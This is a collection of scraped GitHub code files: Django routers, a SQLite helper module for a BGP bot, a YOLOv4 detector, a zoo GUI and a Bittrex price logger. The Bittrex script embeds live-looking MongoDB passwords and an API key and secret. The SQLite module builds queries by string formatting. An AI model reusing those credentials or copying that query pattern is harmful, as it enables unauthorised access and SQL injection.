+{"seq_id":"17224947822","text":"from rest_framework.routers import DefaultRouter\nfrom apps.reports.api.views.reports_viewset import ReportsViewSet\nfrom apps.reports.api.views.general_views import *\n\nrouter = DefaultRouter()\n\nrouter.register(r'reports',ReportsViewSet,basename = 'report')\nrouter.register(r'materias',MaterialsViewSet,basename = 'materias')\nrouter.register(r'tareo',TareoViewSet,basename = 'tareo')\nrouter.register(r'endurancetest',EndurancetestViewSet,basename = 'endurancetest')\nrouter.register(r'airforce',AirForceSerializerViewSet,basename = 'airforce')\nrouter.register(r'servicerequirement',ServiceRequirementViewSet,basename = 'servicerequirement')\nrouter.register(r'productservice',ProductServiceViewSet,basename = 'productservice')\n\nurlpatterns = router.urls","repo_name":"ricardoretamozo/corporacion_djangorest","sub_path":"apps/reports/api/routers.py","file_name":"routers.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"20353092426","text":"from setuptools import setup, Extension\nfrom pathlib import Path\n\nPATH_TO_C = Path(\"./numericalodes/c\")\n\n# https://setuptools.pypa.io/en/latest/userguide/ext_modules.html\n\nc = Extension(\n name=\"numericalodes.c\", # name of the module (like Python import)\n sources=[\n str(PATH_TO_C / file)\n for file in [\n \"c.c\",\n \"RungeKutta4Py.c\",\n \"matrix.c\",\n \"vector.c\",\n ]\n ],\n language=\"c\",\n)\n\nwith open(\"README.md\") as f:\n long_desc = f.read()\n\n# https://packaging.python.org/en/latest/guides/distributing-packages-using-setuptools/\n# https://stackoverflow.com/questions/7948494/whats-the-difference-between-a-python-module-and-a-python-package\n\nsetup(\n name=\"numericalodes\", # name of the package\n version=\"1.0\",\n description=\"Package with functions to calculate systems of ODEs numeracally similar to scipy.integrate.solve_ipv\",\n long_description=long_desc,\n author=\"Andreas Zach\",\n author_email=\"andreas.zach@student.tugraz.at\",\n url=\"https://github.com/zandivx/numericalodes\",\n license=\"MIT\",\n packages=[\"numericalodes\"],\n py_modules=[\"numericalodes.py\", \"numericalodes.c\"],\n ext_modules=[c],\n)\n","repo_name":"zandivx/numericalodes","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18993095679","text":"from scipy import optimize\nimport numpy as np\ndef ufunc(x,alpha,gamma,delta):\n a=-np.log10(10**(alpha*x)+1)\n b=(np.log10(1+np.exp(x)))**gamma\n c=1+np.exp(10**(-x))\n return a+delta*(b/c)\n\ndef getlgstellarmass(lghalomass,z=0,use='GK',cluster=False):\n \n a=1.0/(1+z)\n am1=a-1\n \n nu=np.exp(-4*a**2)\n\n if cluster:\n logep=-1.642\n logm1=11.35\n else:\n logep=-1.777-0.006*am1*nu-.119*am1\n logm1=11.514+(-1.793*am1-.251*z)*nu\n if use=='B':\n alpha=-1.412+(0.731*am1)*nu\n else:\n alpha=-1.92\n if cluster: #Kravtsov 2014\n# delta=4.394\n delta=4.335\n# alpha=-1.779\n alpha=-1.740\n# gamma=0.547\n gamma=0.531\n else:\n delta=3.508+(2.608*am1-0.043*z)*nu\n gamma=0.316+(1.319*am1+.279*z)*nu\n\n lgmstar=logep+logm1+ufunc(lghalomass-logm1,alpha,gamma,delta)-ufunc(0,alpha,gamma,delta)\n\n return lgmstar\n\ndef minfunc(lghalomass,stellarmass,z,use):\n return getlgstellarmass(lghalomass,z,use)-stellarmass\n\ndef gethalomass(stellarmass,z=0,use='GK',**args):\n if stellarmass>10.4:\n lower=10**((stellarmass-6.43)/5.26)\n upper=10**((stellarmass)/5.26)\n else:\n if use=='B':\n lower=(stellarmass+4.8)/1.41\n upper=(stellarmass+8.3)/1.41\n else:\n lower=(stellarmass+10.7)/1.92\n upper=(stellarmass+14.7)/1.92\n\n return optimize.brentq(minfunc,lower,upper,(stellarmass,z,use),**args)\n\n","repo_name":"timcarleton/Fokker_Plank","sub_path":"gethalomass.py","file_name":"gethalomass.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"998187252","text":"import os\nimport csv\n\nbudget_csv=os.path.join(\"C:\\\\Users\\\\18312\\\\Documents\\\\PythonStuff\\\\Python_Challenge\\\\PyBank\\\\budget_data.csv\")\n\nprint()\nprint(\"Financial Analysis\")\nprint(\"-------------------------------\")\n\ntotal_months=0\ntotal_sum=0\nprevious=0\nchange=0\ntotal_change=0\navg_change=0\ngreatest_inc=0\ngreatest_dec=9999999\n\nwith open(budget_csv, 'r') as csvfile:\n csvreader=csv.reader(csvfile, delimiter=',')\n header=next(csvreader)\n\n for row in csvreader:\n\n total_months=total_months+1\n total_sum=total_sum + int(row[1])\n \n \n change=int(row[1])-previous\n total_change=total_change+change\n previous=int(row[1])\n \n\n if change > greatest_inc:\n greatest_inc=change\n if change < greatest_dec:\n greatest_dec=change\n\navg_change=round(total_sum/total_months,2) \n\nprint(\"Total Months: \" + str(total_months))\nprint(\"Total: $\" +str(total_sum))\nprint(\"Average Change: $\" + str(avg_change))\nprint(\"Greatest Increase in Profits: \" + \" $\" + str(greatest_inc))\nprint(\"Greatest Decrease in Profits: \" + \" $\" + str(greatest_dec))\nprint()\n\ndata_output = os.path.join(\"PyBank\", \"PyBank.csv\")\nwith open(data_output, \"w\", newline=\"\") as datafile:\n writer = csv.writer(datafile)","repo_name":"Dillongrow/python-challenge","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"16262654221","text":"# -*- coding: utf-8 -*-\n\nimport sqlite3 as db_api\nimport logging\n\nimport os\nfrom sys import argv\n\nSUBSCRIBERS_DATABASE_NAME = \"subscribers.sqlite3\"\n\nERROR_STATE = None\nSUCCESS_STATE = 0\n\nbase_dirname = os.path.abspath(os.path.dirname(argv[0])) + \"/\"\n\n_database_global_handler = None\n\n\ndef db_connect(db_name=base_dirname+SUBSCRIBERS_DATABASE_NAME):\n\n try:\n db = db_api.connect(db_name, check_same_thread=False)\n except db_api.DatabaseError as e:\n logging.critical(\"Database open error - {}\".format(e))\n return None\n\n global _database_global_handler\n _database_global_handler = db\n\n return _database_global_handler\n\n\ndef save_bgp_table_status(bgp_timestamp, bgp4table_status, bgp6table_status, subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n if bgp4table_status is None or bgp6table_status is None:\n return ERROR_STATE\n\n db_query = \"UPDATE status SET DUMP_TIME = {:d}, IPV4_TEXT = '{:s}', IPV6_TEXT = '{:s}'\".format(\n bgp_timestamp, bgp4table_status, bgp6table_status)\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n db.commit()\n\n except db_api.DatabaseError as e:\n db.rollback()\n logging.critical(\"Database update error - {}\".format(e))\n return ERROR_STATE\n\n return SUCCESS_STATE\n\n\ndef load_bgp_table_status(subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n statuses_fields = (\"status.DUMP_TIME\", \"status.IPV4_TEXT\", \"status.IPV6_TEXT\")\n\n db_query = \"SELECT {} FROM status LIMIT 1\".format(\",\".join(statuses_fields))\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n\n statuses = db_cursor.fetchone()\n\n except db_api.DatabaseError as e:\n logging.critical(\"Database select error - {}\".format(e))\n return ERROR_STATE, ERROR_STATE, ERROR_STATE\n\n if statuses is None or len(statuses) == 0:\n logging.critical(\"Database BGP statuses returned empty data\")\n return ERROR_STATE, ERROR_STATE, ERROR_STATE\n\n bgp_timestamp = statuses[0]\n bgp4_status = statuses[1]\n bgp6_status = statuses[2]\n\n return bgp_timestamp, bgp4_status, bgp6_status\n\n\ndef save_subscriber(is_subscriber_v4, is_subscriber_v6, subscriber_id, subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n db_query_insert = \"INSERT INTO subscribers(subscriber_id, IPV4, IPV6) VALUES({:d},{:d},{:d})\".format(\n subscriber_id,\n is_subscriber_v4,\n is_subscriber_v6)\n\n db_query = \"UPDATE subscribers SET subscriber_id = {0:d}, IPV4 = {1:d}, IPV6 = {2:d} \\\n WHERE subscriber_id={0:d}\" .format(\n subscriber_id,\n is_subscriber_v4,\n is_subscriber_v6)\n\n subscriber_exist = False\n\n db_cursor = db.cursor()\n\n try:\n db_cursor.execute(db_query_insert)\n db.commit()\n except db_api.IntegrityError:\n db.rollback()\n subscriber_exist = True\n except db_api.DatabaseError as e:\n db.rollback()\n logging.critical(\"Database insert error - {}\".format(e))\n return ERROR_STATE\n\n if subscriber_exist:\n try:\n db_cursor.execute(db_query)\n db.commit()\n except db_api.DatabaseError as e:\n db.rollback()\n logging.critical(\"Database update error - {}\".format(e))\n return ERROR_STATE\n\n return SUCCESS_STATE\n\n\ndef 
delete_subscriber(subscriber_id, subscribers_db=None):\n\n    if subscribers_db is None:\n        if _database_global_handler is None:\n            return ERROR_STATE\n        else:\n            db = _database_global_handler\n    else:\n        db = subscribers_db\n\n    db_query = \"DELETE FROM subscribers WHERE subscriber_id={:d}\".format(subscriber_id)\n\n    try:\n        db_cursor = db.cursor()\n        db_cursor.execute(db_query)\n        db.commit()\n    except db_api.DatabaseError as e:\n        db.rollback()\n        logging.critical(\"Database subscriber delete error - {}\".format(e))\n        return ERROR_STATE\n\n    return SUCCESS_STATE\n\n\ndef save_subscribers(subscribers_v4, subscribers_v6, subscribers_db=None):\n\n    if subscribers_db is None:\n        if _database_global_handler is None:\n            return ERROR_STATE\n        else:\n            db = _database_global_handler\n    else:\n        db = subscribers_db\n\n    save_complete_status = SUCCESS_STATE\n    subscribers = set().union(subscribers_v4, subscribers_v6)\n\n    for subscriber_id in subscribers:\n        is_subscriber_v4 = subscriber_id in subscribers_v4\n        is_subscriber_v6 = subscriber_id in subscribers_v6\n\n        if save_subscriber(is_subscriber_v4,\n                           is_subscriber_v6,\n                           subscriber_id, db) != SUCCESS_STATE:\n            save_complete_status = ERROR_STATE\n\n    return save_complete_status\n\n\ndef load_subscribers(table_type, subscribers_db=None):\n\n    if subscribers_db is None:\n        if _database_global_handler is None:\n            return ERROR_STATE\n        else:\n            db = _database_global_handler\n    else:\n        db = subscribers_db\n\n    db_query = \"SELECT subscribers.subscriber_id FROM subscribers \\\nWHERE subscribers.{:s} = 1\".format(table_type)\n\n    try:\n        db_cursor = db.cursor()\n        db_cursor.execute(db_query)\n\n        subscribers = db_cursor.fetchall()\n\n    except db_api.DatabaseError as e:\n        logging.critical(\"Database select error - {}\".format(e))\n        return ERROR_STATE\n\n    if subscribers is None or len(subscribers) == 0:\n        logging.critical(\"Database subscribers returned empty data\")\n        return ERROR_STATE\n\n    subscriber_ids, = zip(*subscribers)\n\n    return set(subscriber_ids)\n\n\ndef db_close(subscribers_db):\n\n    if subscribers_db is not None:\n        subscribers_db.commit()\n        subscribers_db.close()\n\n\ndef load_prefixes(timestamp=0, subscribers_db=None, last=True, trend=False):\n\n    if subscribers_db is None:\n        if _database_global_handler is None:\n            return ERROR_STATE\n        else:\n            db = _database_global_handler\n    else:\n        db = subscribers_db\n\n    prefixes_fields = (\"prefixes.DUMP_TIME\", \"prefixes.IPV4\", \"prefixes.IPV6\")\n\n    if last:\n        order = 'DESC'\n    else:\n        order = 'ASC'\n\n    db_query = \"SELECT {:s} FROM prefixes WHERE prefixes.DUMP_TIME > {:d} \" \\\n               \"ORDER BY prefixes.DUMP_TIME {:s}\".format(\",\".join(prefixes_fields), timestamp, order)\n\n    if trend is False:\n        db_query = db_query + ' LIMIT 1'\n\n    try:\n        db_cursor = db.cursor()\n        db_cursor.execute(db_query)\n\n        if trend:\n            prefixes = db_cursor.fetchall()\n        else:\n            prefixes = db_cursor.fetchone()\n\n    except db_api.DatabaseError as e:\n        logging.critical(\"Database select error - {}\".format(e))\n        return timestamp, ERROR_STATE, ERROR_STATE\n\n    if prefixes is None or len(prefixes) == 0:\n        # logging.critical(\"Database BGP statuses returned empty data\")\n        return timestamp, ERROR_STATE, ERROR_STATE\n\n    if trend:\n        bgp_timestamp = list()\n        bgp4_prefixes = list()\n        bgp6_prefixes = list()\n\n        for dump_trend in prefixes:\n            bgp_timestamp.append(dump_trend[0])\n            bgp4_prefixes.append(dump_trend[1])\n            bgp6_prefixes.append(dump_trend[2])\n    else:\n        bgp_timestamp = prefixes[0]\n        bgp4_prefixes = prefixes[1]\n        bgp6_prefixes = prefixes[2]\n\n    return bgp_timestamp, bgp4_prefixes, 
bgp6_prefixes\n\n\ndef load_ases(timestamp, subscribers_db=None, last=True, trend=False):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n ases_fields = (\"ases.DUMP_TIME\",\n \"ases.ASNV4\", \"ases.ASNV6\",\n \"ases.ASNV4_ONLY\", \"ases.ASNV6_ONLY\",\n \"ases.ASNV4_32\", \"ases.ASNV6_32\")\n\n if last:\n order = 'DESC'\n else:\n order = 'ASC'\n\n db_query = \"SELECT {:s} FROM ases WHERE ases.DUMP_TIME > {:d} \" \\\n \"ORDER BY ases.DUMP_TIME {:s}\".format(\",\".join(ases_fields), timestamp, order)\n\n if trend is False:\n db_query = \"SELECT {:s} FROM ases WHERE ases.DUMP_TIME = {:d} LIMIT 1\".format(\",\".join(ases_fields), timestamp)\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n\n if trend:\n ases = db_cursor.fetchall()\n else:\n ases = db_cursor.fetchone()\n\n except db_api.DatabaseError as e:\n logging.critical(\"Database select error - {}\".format(e))\n return timestamp, (ERROR_STATE,)\n\n if ases is None or len(ases) == 0:\n # logging.critical(\"Database BGP statuses returned empty data\")\n return timestamp, (ERROR_STATE,)\n\n if trend:\n bgp_timestamp = list()\n ases_status = list()\n\n for dump_trend in ases:\n bgp_timestamp.append(dump_trend[0])\n ases_dump = list()\n for ases_trend in dump_trend[1:]:\n ases_dump.append(ases_trend)\n\n ases_status.append(ases_dump)\n else:\n bgp_timestamp = ases[0]\n ases_status = ases[1:]\n\n return bgp_timestamp, ases_status\n\n\ndef load_ases_stat(timestamp, subscribers_db=None):\n\n if subscribers_db is None:\n if _database_global_handler is None:\n return ERROR_STATE\n else:\n db = _database_global_handler\n else:\n db = subscribers_db\n\n ases_fields = (\"ases.DUMP_TIME\",\n \"ases.ASNV4_PREF\", \"ases.ASNV6_PREF\")\n\n db_query = \"SELECT {:s} FROM ases WHERE ases.DUMP_TIME = {:d} LIMIT 1\".format(\",\".join(ases_fields), timestamp)\n\n try:\n db_cursor = db.cursor()\n db_cursor.execute(db_query)\n ases_stat = db_cursor.fetchone()\n except db_api.DatabaseError as e:\n logging.critical(\"Database select error - {}\".format(e))\n return timestamp, (ERROR_STATE,)\n\n if ases_stat is None or len(ases_stat) == 0:\n # logging.critical(\"Database BGP statuses returned empty data\")\n return timestamp, (ERROR_STATE,)\n\n bgp_timestamp = ases_stat[0]\n ases4_prefixes = ases_stat[1]\n ases6_prefixes = ases_stat[2]\n\n return bgp_timestamp, ases4_prefixes, ases6_prefixes","repo_name":"Urlandi/FullViewBot","sub_path":"db_api.py","file_name":"db_api.py","file_ext":"py","file_size_in_byte":10728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
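An illustrative wiring of the db_api module in the record above, assuming the subscribers.sqlite3 schema it expects (status, subscribers, prefixes, ases tables) already exists:

db = db_connect()
if db is not None:
    # Last saved BGP table status and the set of IPv4 subscriber ids.
    ts, v4_status, v6_status = load_bgp_table_status(db)
    ipv4_subscribers = load_subscribers("IPV4", db)  # returns a set, or ERROR_STATE
    db_close(db)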
+{"seq_id":"32654984285","text":"import os\r\nimport time\r\nimport cv2\r\nimport numpy as np\r\n\r\n\r\ndef show_image(img):\r\n cv2.imshow('image', img)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\r\n\r\n\r\nprint('Opencv version: ', cv2.__version__)\r\n\r\nconfig_path = './cfg'\r\ncoco_names = 'coco.names'\r\nlabels_path = os.path.join(config_path, coco_names)\r\n\r\nwith open(labels_path, 'r') as f:\r\n labels = f.read().strip().split('\\n')\r\n\r\nnet = cv2.dnn.readNetFromDarknet(\r\n './cfg/yolov4.cfg', './heights/yolov4.weights')\r\n\r\n# cores do bounding box\r\nCOLORS = np.random.randint(0, 255, (len(labels), 3), 'uint8')\r\n\r\n# camadas\r\nln = net.getLayerNames()\r\n# camadas de saida\r\noutput_layers = np.take(ln, net.getUnconnectedOutLayers() - 1)\r\n\r\n# imagem de entrada\r\nimg = cv2.imread('./data/eagle.jpg', 1)\r\nimg_copy = img.copy()\r\n\r\nH, W = img.shape[:2]\r\nprint(f'Height: {H} - Width {W}')\r\n\r\nstart = time.time()\r\n\r\nblob = cv2.dnn.blobFromImage(\r\n img, 1 / 255.0, (416, 416), swapRB=True, crop=False)\r\n\r\nnet.setInput(blob)\r\noutputs = net.forward(output_layers)\r\n\r\nend = time.time()\r\nprint(f'Elapsed time: {end - start}')\r\n\r\nthreshold = 0.5 # gatilho de confiança\r\nthreshold_NMS = 0.3 # non maximum supression\r\nbounding_box = []\r\nconfidences = []\r\nclasses_id = []\r\n\r\n\r\nfor output in outputs:\r\n for detection in output:\r\n # os valores a partir da posição 5 são as porcentagens do objeto\r\n # detectado\r\n scores = detection[5:]\r\n # pegamos o index da maior porcentagem detectada\r\n class_id = np.argmax(scores)\r\n # pegamos a porgentagem\r\n confidence = scores[class_id]\r\n if confidence >= threshold:\r\n print(f'Class: {labels[class_id]} | '\r\n f'Confidence: {confidence * 100 :.2f}%')\r\n\r\n (centerX, centerY, width,\r\n height) = detection[:4] * np.array([W, H, W, H])\r\n\r\n x = int(centerX - (width / 2))\r\n y = int(centerY - (height / 2))\r\n\r\n bounding_box.append([x, y, int(width), int(height)])\r\n confidences.append(float(confidence))\r\n classes_id.append(class_id)\r\n\r\n# non max supression\r\nobjs = cv2.dnn.NMSBoxes(bounding_box, confidences, threshold, threshold_NMS)\r\n\r\nif len(objs):\r\n for obj in objs:\r\n x, y = bounding_box[obj][0], bounding_box[obj][1]\r\n w, h = bounding_box[obj][2], bounding_box[obj][3]\r\n # img_new = img_copy[y: y+h, x: x+w]\r\n colors = [int(c) for c in COLORS[classes_id[obj]]]\r\n\r\n cv2.rectangle(img, (x, y), (x + w, y + h), colors, 2)\r\n text = f'{labels[classes_id[obj]]} - '\\\r\n f'{confidences[obj] * 100 :.2f}'\r\n cv2.putText(img, text, (x, y - 5),\r\n cv2.FONT_HERSHEY_SIMPLEX, 0.5, colors, 2)\r\n\r\nshow_image(img)\r\n","repo_name":"lmonferrari/obj_detection","sub_path":"v1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"18928253230","text":"import sqlite3\n\n\nclass DBManager:\n \"\"\"\n DB connection object to manage date entry and retrieval\n\n Attributes:\n path (str) : path to database\n \"\"\"\n def __init__(self, path):\n self.db = sqlite3.connect(path)\n self.conn = self.db.cursor()\n\n def __del__(self):\n self.db.close()\n\n def insert_book(self, value_tuple):\n '''Insert book into database.'''\n query = '''\n INSERT INTO books (title, isbn_13, publisher, publication_date, \n series, edition_description, pages, sales_rank, \n price, product_width, product_height, product_depth) \n VALUES (?,?,?,?,?,?,?,?,?,?,?,?)\n '''\n\n self.conn.execute(query, value_tuple)\n self.db.commit()","repo_name":"BlindPrimate/tech_test_enterbridge","sub_path":"db/db_manager.py","file_name":"db_manager.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"25086123217","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url(r'^$', views.Employees.as_view(), name='employees'),\n url(r'^add-employee/$', views.add_employee, name='add_employee'),\n url(r'^export-employee/$', views.export_members, name=\"export_employee\"),\n url(r'^detail/$', views.EmployeeDetail.as_view(), name='e_details'),\n url(r'^(?P\\d+)/profile/$', views.Profile.as_view(), name='detail'),\n url(r'^update/$', views.EmployeeUpdate.as_view(), name='update'),\n url(r'^(?P\\d+)/make-request', views.make_request, name='request'),\n url(r'^(?P\\d+)/make-complain', views.make_complain, name='complain'),\n url(r'^history/$', views.RequestList.as_view(), name='leave_history'),\n url(r'^chat/$', views.EmployeeList.as_view(), name='employee_list'),\n\n ]","repo_name":"somchi/EnterpriseSystem","sub_path":"Employee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"73932413866","text":"from tkinter import *\nfrom tkinter.ttk import Notebook\nimport species\nimport enclosures\nimport exhibits\nimport donors\n\ndef backClicked():\n visitorPage.destroy()\n backFrame.place(relwidth=1,relheight=1)\n\ndef handleVisitorPage(window, bFrame):\n global backFrame\n backFrame = bFrame\n\n global visitorPage\n visitorPage = Frame(window)\n visitorPage.place(relwidth=1, relheight = 1)\n\n backButton = Button(visitorPage, text=\"Back\", command=backClicked)\n visitorNotebook = Notebook(visitorPage)\n visitorNotebook.grid(row=1,column=0)\n backButton.grid(row=0,column=0,columnspan=2,sticky=N+W,padx=5)\n visitorNotebook.grid(row=1,column=0)\n\n visitorPage.rowconfigure(0,weight=1)\n visitorPage.rowconfigure(1,weight=1)\n visitorPage.columnconfigure(0,weight=1)\n visitorPage.columnconfigure(1,weight=1)\n\n # create frames\n enclosuresFrame = Frame(visitorNotebook, width=1000, height=700)\n exhibitsFrame = Frame(visitorNotebook, width=1000, height=700)\n speciesFrame = Frame(visitorNotebook, width=1000, height=700)\n donorFrame = Frame(visitorNotebook, width=1000, height=700)\n\n enclosuresFrame.pack(fill='both', expand=True)\n exhibitsFrame.pack(fill='both', expand=True)\n speciesFrame.pack(fill='both', expand=True)\n donorFrame.pack(fill='both', expand=True)\n\n visitorNotebook.add(enclosuresFrame, text='Enclosures')\n visitorNotebook.add(exhibitsFrame, text='Exhibits')\n visitorNotebook.add(speciesFrame, text='Species')\n visitorNotebook.add(donorFrame, text='Donors')\n\n enclosures.set_enclosures_frame(enclosuresFrame, False)\n exhibits.set_exhibits_frame(exhibitsFrame, False)\n species.setSpeciesFrame(speciesFrame, False)\n donors.set_donors_frame(donorFrame, True)\n","repo_name":"MackenzieBowal/ZooDatabase_Project","sub_path":"gui/visitor.py","file_name":"visitor.py","file_ext":"py","file_size_in_byte":1747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"42270292353","text":"from rest_framework.routers import DefaultRouter, SimpleRouter\nfrom .views import OrderViewSet\n\n\nclass OptionalSlashRouter(DefaultRouter):\n def __init__(self):\n self.trailing_slash = '/?'\n super(SimpleRouter, self).__init__()\n\n\nrouter = OptionalSlashRouter()\nrouter.register(\"orders\", OrderViewSet, basename='orders')\nurlpatterns = router.urls\n","repo_name":"sfill70/stepik_rest_api_market","sub_path":"order/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"36207239418","text":"#!/usr/bin/python \n# -*- coding=utf8 -*-\n# Created by carrot on 2017/8/28.\n\n\"\"\"\n题目:模仿静态变量(static)另一案例。\n\"\"\"\nclass Num:\n nNum = 1\n def inc(self):\n self.nNum += 1\n print('nNum = %d' % self.nNum )\n\ndef main():\n nNum = 2\n inst = Num()\n for i in range(3):\n nNum += 1\n print('The num = %d' % nNum )\n inst.inc()\n\n\nif __name__ == \"__main__\":\n main()\n\n ","repo_name":"116pythonZS/YiBaiExample","sub_path":"043.py","file_name":"043.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8575411536","text":"from __future__ import print_function\n\nimport pymongo\nimport threading\nimport datetime\nfrom ast import literal_eval\nimport redis\n\nfrom lxml import html\nimport os\nimport sys\nimport datetime as dt\nimport json\nimport requests\nfrom time import sleep\nfrom bittrex import Bittrex\n\nimport pymongo\nfrom pymongo import MongoClient\n\nsys.path.insert(0, os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\n# from common import get_arg\n# Update Python Path to be able to load custom modules. Do not change line position.\n\n# number = 0\n\n\nclass Subscriber:\n def __init__(self, name=None):\n if not name:\n self.name = str(self.__class__).split(' ')[1].split(\"'\")[1]\n else:\n self.name = name\n\n def update(self, message):\n # start new Thread in here to handle any task\n print('\\n\\n {} got message \"{}\"'.format(self.name, message))\n\n\nclass MyMongoClient(Subscriber):\n\n def __init__(self, db_name, collection_name, host='localhost', is_exchange_data=False, port=27017, *args, **kwargs):\n self._c = pymongo.MongoClient(host, port)\n self.set_database(db_name)\n self.set_collection(collection_name)\n self.collection_name = collection_name\n self.db_name = db_name\n self.redis = redis.Redis(host='localhost', port=6379, db=0)\n self.is_exchange_data = is_exchange_data\n\n def is_duplicate_data(self, msg):\n return self.collection.find_one(msg)\n\n def insert_one(self, data):\n self.collection.insert_one(data)\n print('------table name-----')\n print(self.collection)\n print('Inserted: \\n{}'.format(data))\n\n def insert_many(self, msg):\n self.collection.insert_many(msg)\n\n def update(self, msg):\n # msg = literal_eval(msg)\n if not self.is_exchange_data:\n t = threading.Thread(target=self.check_duplicity_and_update_record, args=(msg,))\n else:\n t = threading.Thread(target=self.set_in_redis, args=(msg,))\n t.start()\n\n def check_duplicity_and_update_record(self, msg):\n if not self.is_duplicate_data(msg):\n t = threading.Thread(target=self.insert_many, args=(msg,)) if type(msg) == list else threading.Thread(\n target=self.insert_one, args=(msg,))\n t.start()\n\n def set_in_redis(self, msg):\n key = datetime.datetime.now().replace(second=0, microsecond=0)\n data = {self.db_name: {self.collection_name: [msg]}}\n\n if self.redis.exists(key):\n data = literal_eval(self.redis.get(key))\n print(data)\n if data.has_key(self.db_name) and data[self.db_name].has_key(self.collection_name):\n\n if type(msg) == list:\n data[self.db_name][self.collection_name].extend(msg)\n else:\n data[self.db_name][self.collection_name].append(msg)\n elif data.has_key(self.db_name):\n data[self.db_name].update({self.collection_name: [msg]})\n self.redis.set(key, data)\n\n def set_collection(self, collection_name):\n self.collection = self.database[collection_name]\n\n def set_database(self, db_name):\n self.database = self._c[db_name]\n\n\ndef get_arg(index, default=None):\n \"\"\"\n Grabs a value from the command line or returns the default one.\n \"\"\"\n try:\n return sys.argv[index]\n except IndexError:\n return default\n\n\ndef get_data(number):\n\n db_name = 'BB_coins'\n trader = get_arg(1) # 'LANDON', 'CHRISTIAN' OR 'VIVEK.\n\n # with open('accountkey.json') as data_file:\n # data = json.load(data_file)\n # print(data)\n\n collection_name = '{}_bittrex_account'.format(trader)\n try:\n mongoserver_uri = \"mongodb://Writeuser:TYHJ8ttfZ6JPRvSZbqcW@10.8.0.2:27017/admin\"\n # mongoserver_uri = \"mongodb://Readuser:jbh4S3pCpTGCdIGGVOU6@127.0.0:1\"\n connection = 
MongoClient(host=mongoserver_uri)\n db = connection['BB_coins']\n db_collection = db[collection_name]\n\n except KeyError:\n host = 'localhost'\n db_collection = MyMongoClient(db_name, collection_name=collection_name, host=host)\n\n balance_curr_codes = []\n market_names = []\n\n # key, secret = \"141172172c12458f8d0051d4c2618559\", \"2d944113b64844f2b3ad33030f99101a\"\n key = get_arg(2)\n secret = get_arg(3)\n\n api = Bittrex(api_key=key, api_secret=secret)\n markets_data = api.get_markets()[\"result\"]\n\n for markets_datum in markets_data:\n if markets_datum[\"BaseCurrency\"] == 'BTC':\n balance_curr_codes.append(markets_datum[\"MarketCurrency\"])\n market_names.append(markets_datum[\"MarketName\"])\n\n for market_name in market_names:\n market_history_data = api.get_market_history(market_name, count=1)[\"result\"][0]\n balance_curr_code = market_name.split('-')[1]\n json_data = ({\n 'Number': number,\n 'balance_curr_code': balance_curr_code,\n 'last_price': market_history_data['Price'],\n 'TimeStamp': market_history_data['TimeStamp']})\n\n db_collection.insert_one(json_data)\n print('------table name-----')\n print(collection_name)\n print('Inserted: \\n{}'.format(json_data))\n\nif __name__ == \"__main__\":\n\n # Time setting.\n number = 0\n next_call = dt.datetime.now()\n time_between_calls = dt.timedelta(seconds=300)\n\n # Main loop.\n while True:\n now = dt.datetime.now()\n if now >= next_call:\n try:\n next_call = now + time_between_calls\n number += 1\n get_data(number)\n except:\n continue\n\n","repo_name":"realchief/BittrexAccountMonitor","sub_path":"web_reports_coins/coins_data_retriever.py","file_name":"coins_data_retriever.py","file_ext":"py","file_size_in_byte":5703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
